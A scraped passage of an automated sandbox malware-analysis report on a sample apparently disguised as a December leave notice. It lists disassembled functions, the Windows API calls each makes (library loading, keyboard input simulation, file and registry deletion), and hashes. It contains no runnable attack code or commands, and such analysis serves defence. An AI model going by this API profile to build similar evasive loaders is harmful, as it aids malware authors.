                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                      • API String ID: 2574300362-1816364905
                                                      • Opcode ID: 7a1271076111f23f4f860720cbbb33defd52697dd6f1d80ca2b32f7c2db36822
                                                      • Instruction ID: ac93fbff76815d20d0824e832c81b91ec2ba4dec2df2eadd9a9915a5e314a2c3
                                                      • Opcode Fuzzy Hash: 7a1271076111f23f4f860720cbbb33defd52697dd6f1d80ca2b32f7c2db36822
                                                      • Instruction Fuzzy Hash: 15D05E30810723AECB216BA1A44868276E8AB04310F04842EA8C5D6200DF74C880E760
                                                      Function 00FDBADD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00FDBAD3,00000001,00FDB6EE,?,0101DC00), ref: 00FDBAEB
                                                      • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00FDBAFD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: GetModuleHandleExW$kernel32.dll
                                                      • API String ID: 2574300362-199464113
                                                      • Opcode ID: d567d9950fc183b299ddf37b4e92d1e6b6e74f8300cfc25930967f61e16e6ee2
                                                      • Instruction ID: c6c5402e4ddddc38ce168c9349e7fe0aafa519d2244e77e81c8b44f57176c00e
                                                      • Opcode Fuzzy Hash: d567d9950fc183b299ddf37b4e92d1e6b6e74f8300cfc25930967f61e16e6ee2
                                                      • Instruction Fuzzy Hash: 50D05E30D00712EEC7315FA1A449A55B6D8AB45310F05441FA8C3D2204DB74C880D760
                                                      Function 00FE3BDB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(advapi32.dll,?,00FE3BD1,?,00FE3E06), ref: 00FE3BE9
                                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00FE3BFB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                      • API String ID: 2574300362-4033151799
                                                      • Opcode ID: d35bd6ab46542ec17512f7e34959c110c2c1dde83145e9d02ef40bd972f93816
                                                      • Instruction ID: bc7c23bc3ad7acca8550d3a1a53debe5dcd8e76ca96320c385d920bd33fa02b2
                                                      • Opcode Fuzzy Hash: d35bd6ab46542ec17512f7e34959c110c2c1dde83145e9d02ef40bd972f93816
                                                      • Instruction Fuzzy Hash: B8D09EB0900752EAD7215FEAA41C642BAE9AB49625F20441DE4D5E6104DBB4D8809F61
                                                      Function 00FB9B30 Relevance: 6.3, APIs: 4, Instructions: 306COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1f67fa27ced43d417d8898ded7a2d33ee8ac8e1211bde481c537dd5698a29b58
                                                      • Instruction ID: 79550a3dbf907e1fe6f2f46065f7012fd7acc13afe981081ac816f91d23416c5
                                                      • Opcode Fuzzy Hash: 1f67fa27ced43d417d8898ded7a2d33ee8ac8e1211bde481c537dd5698a29b58
                                                      • Instruction Fuzzy Hash: BBC15E75A0421AEFCB14DF95C884AEEB7B5FF48710F108598EA05AB291D770DE41EFA0
                                                      Function 00FDAA84 Relevance: 6.3, APIs: 4, Instructions: 268COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CoInitialize.OLE32(00000000), ref: 00FDAAB4
                                                      • CoUninitialize.OLE32 ref: 00FDAABF
                                                        • Part of subcall function 00FC0213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00FC027B
                                                      • VariantInit.OLEAUT32(?), ref: 00FDAACA
                                                      • VariantClear.OLEAUT32(?), ref: 00FDAD9D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                      • String ID:
                                                      • API String ID: 780911581-0
                                                      • Opcode ID: 6c8248ef334d1f9bba50fd0d4e6470cc12001875e88ce87e3cde67479253291a
                                                      • Instruction ID: f3c2ecee7f7b9e2333ac9351559954f6680b91cd574d01c8b5fd5790a26c0312
                                                      • Opcode Fuzzy Hash: 6c8248ef334d1f9bba50fd0d4e6470cc12001875e88ce87e3cde67479253291a
                                                      • Instruction Fuzzy Hash: 35A17D356047019FDB11EF14C881B6EB7E6BF88720F18444AF9969B3A1CB74ED05EB86
                                                      Function 00FB91CC Relevance: 6.2, APIs: 4, Instructions: 201memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Variant$AllocClearCopyInitString
                                                      • String ID:
                                                      • API String ID: 2808897238-0
                                                      • Opcode ID: a9fd35a43e810dd89078a9ad0a9cb9069c3e4eae6e840b841629ea86fd55c209
                                                      • Instruction ID: 0cd3c31354207f0bbfd718127ec976ae29b6b0b009daaf8701aca3159ce1c74e
                                                      • Opcode Fuzzy Hash: a9fd35a43e810dd89078a9ad0a9cb9069c3e4eae6e840b841629ea86fd55c209
                                                      • Instruction Fuzzy Hash: 5951AC31A087069BDB249F67D8957AEB3E9EF45310F24881FE746C72D1DBB49880AF11
                                                      Function 00FA365B Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                      • String ID:
                                                      • API String ID: 3877424927-0
                                                      • Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                      • Instruction ID: bb2f495d285573782b2f7aae2203acd2cc5655acaa53c2b2a4a152fb9c9add68
                                                      • Opcode Fuzzy Hash: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                      • Instruction Fuzzy Hash: 1051A2F5E04305ABDB249FA9C884A6E77B5AF42330F248729F825963D0D774AF50EB50
                                                      Function 00FEC4D7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetWindowRect.USER32(018675C0,?), ref: 00FEC544
                                                      • ScreenToClient.USER32(?,00000002), ref: 00FEC574
                                                      • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 00FEC5DA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Window$ClientMoveRectScreen
                                                      • String ID:
                                                      • API String ID: 3880355969-0
                                                      • Opcode ID: 4ef92d32cc9257e3e488efd486517b0743456dfa41181056c8431f30c63d9f30
                                                      • Instruction ID: 605e2ab1629b8353d4448646607470c193eec729912b0a505099edcdff4176f3
                                                      • Opcode Fuzzy Hash: 4ef92d32cc9257e3e488efd486517b0743456dfa41181056c8431f30c63d9f30
                                                      • Instruction Fuzzy Hash: 13515EB5900244EFCF20DF69C880AAE7BB5FF59320F148659F95997284D734ED82DB90
                                                      Function 00FBC410 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00FBC462
                                                      • __itow.LIBCMT ref: 00FBC49C
                                                        • Part of subcall function 00FBC6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00FBC753
                                                      • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00FBC505
                                                      • __itow.LIBCMT ref: 00FBC55A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$__itow
                                                      • String ID:
                                                      • API String ID: 3379773720-0
                                                      • Opcode ID: 95b30d275e1c9620c3b9e8df77ba43c00c3661f449773628aa789aa6cf342506
                                                      • Instruction ID: f8fcacd8a1faeb0d772e9303804249dc8d60a747efc68424aebdb330e3e5ea67
                                                      • Opcode Fuzzy Hash: 95b30d275e1c9620c3b9e8df77ba43c00c3661f449773628aa789aa6cf342506
                                                      • Instruction Fuzzy Hash: CC41E371A00608AFDF21EF55CC46BEF7BB9AF49710F000019F905A7281DB789A459FA1
                                                      Function 00FC390C Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00FC3966
                                                      • SetKeyboardState.USER32(00000080,?,00000001), ref: 00FC3982
                                                      • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 00FC39EF
                                                      • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00FC3A4D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: KeyboardState$InputMessagePostSend
                                                      • String ID:
                                                      • API String ID: 432972143-0
                                                      • Opcode ID: 4aeeb8651ec63a1d668cd9da05e467548a63e854cb67c6f45b4203ebf1ee215c
                                                      • Instruction ID: d4827b8dcdffad1a7432ccb14605d05206e505b6aa710c28324bfdb4f3813520
                                                      • Opcode Fuzzy Hash: 4aeeb8651ec63a1d668cd9da05e467548a63e854cb67c6f45b4203ebf1ee215c
                                                      • Instruction Fuzzy Hash: B7412C70E04209AEEF358BA48907FFDBBB69B55360F04815EE4C1625C1C7B98E85F761
                                                      Function 00FCE698 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00FCE742
                                                      • GetLastError.KERNEL32(?,00000000), ref: 00FCE768
                                                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00FCE78D
                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00FCE7B9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                                      • String ID:
                                                      • API String ID: 3321077145-0
                                                      • Opcode ID: 95e33bdf68d6ee1b0d71e4fcca8c195c9ec20905ccecd1406f4f448c3a0cd080
                                                      • Instruction ID: c9f7b42d8099897d9ea69e2eb6c82d42a8a31bc5c862ab9f2fdd8e8f4f3b1499
                                                      • Opcode Fuzzy Hash: 95e33bdf68d6ee1b0d71e4fcca8c195c9ec20905ccecd1406f4f448c3a0cd080
                                                      • Instruction Fuzzy Hash: 16416A39600611DFCF12EF54C945A5DBBE5BF59720F088088E956AB3A2CB78FD00EB91
                                                      Function 00FEB544 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00FEB5D1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: InvalidateRect
                                                      • String ID:
                                                      • API String ID: 634782764-0
                                                      • Opcode ID: dae82514133f59e51cbfa5762c5fccc9a0af9b0d3e580c6eb9729d8a36c42809
                                                      • Instruction ID: 5448685e8db3c27dd4e823f2753c99e26f3df41db7eca85caad694281926e36c
                                                      • Opcode Fuzzy Hash: dae82514133f59e51cbfa5762c5fccc9a0af9b0d3e580c6eb9729d8a36c42809
                                                      • Instruction Fuzzy Hash: 91313374A01284BFEF319F9ACC84FAE3764EB05320F184552F641D61E5CB34E940BB51
                                                      Function 00FED7DE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ClientToScreen.USER32(?,?), ref: 00FED807
                                                      • GetWindowRect.USER32(?,?), ref: 00FED87D
                                                      • PtInRect.USER32(?,?,00FEED5A), ref: 00FED88D
                                                      • MessageBeep.USER32(00000000), ref: 00FED8FE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Rect$BeepClientMessageScreenWindow
                                                      • String ID:
                                                      • API String ID: 1352109105-0
                                                      • Opcode ID: c972ea75271d4d8b05449fedcd64f909cd33807a062f546ece546fb129a1f14e
                                                      • Instruction ID: fe1b38ca67c6c1584b60e68debff8b2d5c76e3aa7e1f0b5aa7d2609d1d173099
                                                      • Opcode Fuzzy Hash: c972ea75271d4d8b05449fedcd64f909cd33807a062f546ece546fb129a1f14e
                                                      • Instruction Fuzzy Hash: 3341D0B4E00288DFCB21DF9AC880BA97BF5FF49360F1881A9E454DB644C331EA45DB51
                                                      Function 00FC3A61 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00FC3AB8
                                                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 00FC3AD4
                                                      • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00FC3B34
                                                      • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00FC3B92
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: KeyboardState$InputMessagePostSend
                                                      • String ID:
                                                      • API String ID: 432972143-0
                                                      • Opcode ID: 2574acc1970c4ec45b9b17fae874a29d254684463a250eec2dba80705b75c5ff
                                                      • Instruction ID: 44004fd22e5947e2a921beec1e0d2c229a0f5e5fded835372e66c132688d68f7
                                                      • Opcode Fuzzy Hash: 2574acc1970c4ec45b9b17fae874a29d254684463a250eec2dba80705b75c5ff
                                                      • Instruction Fuzzy Hash: 3D316630D0025AAEEF318BA48A1BFFD7BB59B85360F04411EE481A31C1C7798F41E761
                                                      Function 00FB4004 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00FB4038
                                                      • __isleadbyte_l.LIBCMT ref: 00FB4066
                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00FB4094
                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00FB40CA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                      • String ID:
                                                      • API String ID: 3058430110-0
                                                      • Opcode ID: 26242e8c0052bc9f2a6bbfa47f553da6027d2f5109dbf49b24cb749e72bfebfd
                                                      • Instruction ID: 9f63ed0e1b80294b7000ff0d4b4e19c12f44471d0c1bd1526f001fcd95d4c8ef
                                                      • Opcode Fuzzy Hash: 26242e8c0052bc9f2a6bbfa47f553da6027d2f5109dbf49b24cb749e72bfebfd
                                                      • Instruction Fuzzy Hash: CC31D431A00215AFDB21AF76C944BFA7BB5FF413A0F154018E66187192D731E890EF90
                                                      Function 00FE7CA5 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetForegroundWindow.USER32 ref: 00FE7CB9
                                                        • Part of subcall function 00FC5F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00FC5F6F
                                                        • Part of subcall function 00FC5F55: GetCurrentThreadId.KERNEL32 ref: 00FC5F76
                                                        • Part of subcall function 00FC5F55: AttachThreadInput.USER32(00000000,?,00FC781F), ref: 00FC5F7D
                                                      • GetCaretPos.USER32(?), ref: 00FE7CCA
                                                      • ClientToScreen.USER32(00000000,?), ref: 00FE7D03
                                                      • GetForegroundWindow.USER32 ref: 00FE7D09
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                      • String ID:
                                                      • API String ID: 2759813231-0
                                                      • Opcode ID: 5f0d6ee54b613c88b49dd30586598eca39caca18a14945681a7019af3f4817d7
                                                      • Instruction ID: bd0f06ef8d1bb6a4e2946333ec62fbfbb26f3902c51ace3f8ea5ccf9edb65401
                                                      • Opcode Fuzzy Hash: 5f0d6ee54b613c88b49dd30586598eca39caca18a14945681a7019af3f4817d7
                                                      • Instruction Fuzzy Hash: 31311E72D00108AFDB11EFA9DC459EFBBF9EF54310B10846AE815E3211DA359E45DBA0
                                                      Function 00FEF1D7 Relevance: 6.1, APIs: 4, Instructions: 80windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F9B34E: GetWindowLongW.USER32(?,000000EB), ref: 00F9B35F
                                                      • GetCursorPos.USER32(?), ref: 00FEF211
                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00FFE4C0,?,?,?,?,?), ref: 00FEF226
                                                      • GetCursorPos.USER32(?), ref: 00FEF270
                                                      • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00FFE4C0,?,?,?), ref: 00FEF2A6
                                                      Memory Dump Source
